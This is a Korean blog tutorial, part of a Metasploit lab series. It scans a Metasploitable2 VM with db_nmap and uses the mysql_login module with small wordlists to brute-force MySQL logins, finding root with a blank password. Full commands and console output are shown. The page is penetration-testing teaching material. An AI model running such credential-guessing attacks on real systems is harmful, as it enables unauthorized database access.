정보보안(구버전)/Metasploit 2016. 6. 2. 16:41
Metasploit - 05. 취약점 발견 및 공격 (MySQL 원격 로그인 시도)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
[실습 시스템] Kali Linux, Firewall, Metasploitable2-Linux
- 메타스플로잇을 이용하여 취약점을 발견한 다음, 사전 파일을 이용하여 MySQL 원격 로그인을 하도록 한다.
[실습 단계]
ID/PASSWORD 사전 파일 생성 -> MySQL 취약점 공격 -> 사용자 계정 정보 획득
Ex1) 아이디/패스워드 사전 파일 생성
@ Kali Linux
- 아이디/패스워드 사전 파일을 간단하게 생성한다. (Metasploitable2-Linux는 MySQL root 패스워드가 없음)
root@kali:~# cd /usr/share/metasploit-framework/data/wordlists/
root@kali:/usr/share/metasploit-framework/data/wordlists# vi user.txt
|
root
: wq! |
root@kali:/usr/share/metasploit-framework/data/wordlists# vi pass.txt
|
<공백> root
: wq! |
root@kali:/usr/share/metasploit-framework/data/wordlists# ls user.txt pass.txt
pass.txt user.txt
root@kali:/usr/share/metasploit-framework/data/wordlists# cd
root@kali:~#
Ex2) db_nmap 스캔 실시
- '192.168.20.204'를 타겟으로 db_nmap 스켄을 실시한다.
-sV: Probe open ports to determine service/version info
root@kali:~# msfconsole
msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login?
[*] Nmap: 514/tcp open shell Netkit rshd
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open shell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: 6000/tcp open X11 (access denied)
[*] Nmap: 6667/tcp open irc Unreal ircd
[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 00:0C:29:34:5A:8A (VMware)
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 17.26 seconds
msf >
- 'mysql_login' 관련 모듈을 검색한다.
msf > search mysql
~ 중간 생략 ~
msf > search mysql_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) >
smsf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt
msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt
msf auxiliary(mysql_login) > run
[*] 192.168.20.204:3306 MYSQL - Found remote MySQL version 5.0.51a
[+] 192.168.20.204:3306 MYSQL - Success: 'root:'
[-] 192.168.20.204:3306 MYSQL - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: NO))
[-] 192.168.20.204:3306 MYSQL - LOGIN FAILED: admin:root (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 MYSQL - LOGIN FAILED: admin:admin (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >
msf auxiliary(mysql_login) > quit
root@kali:~#
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
Metasploit - 제1장 메타스플로잇 (metaspliot)
'정보보안(구버전) > Metasploit' 카테고리의 다른 글
| Metasploit - 07. 취약점 발견 및 공격 (CVE-2008-0166) (0) | 2016.06.03 |
|---|---|
| Metasploit - 06. 취약점 발견 및 공격 (tikiwiki 취약점 공격) (0) | 2016.06.02 |
| Metasploit - 04. 공격 타겟 스캐닝 (0) | 2016.06.02 |
| Metasploit - 03. 외부 스캔 파일 사용하는 방법 (0) | 2016.06.02 |
| Metasploit - 02. 메타스플로잇 명령어 및 사용 방법 (0) | 2016.06.01 |
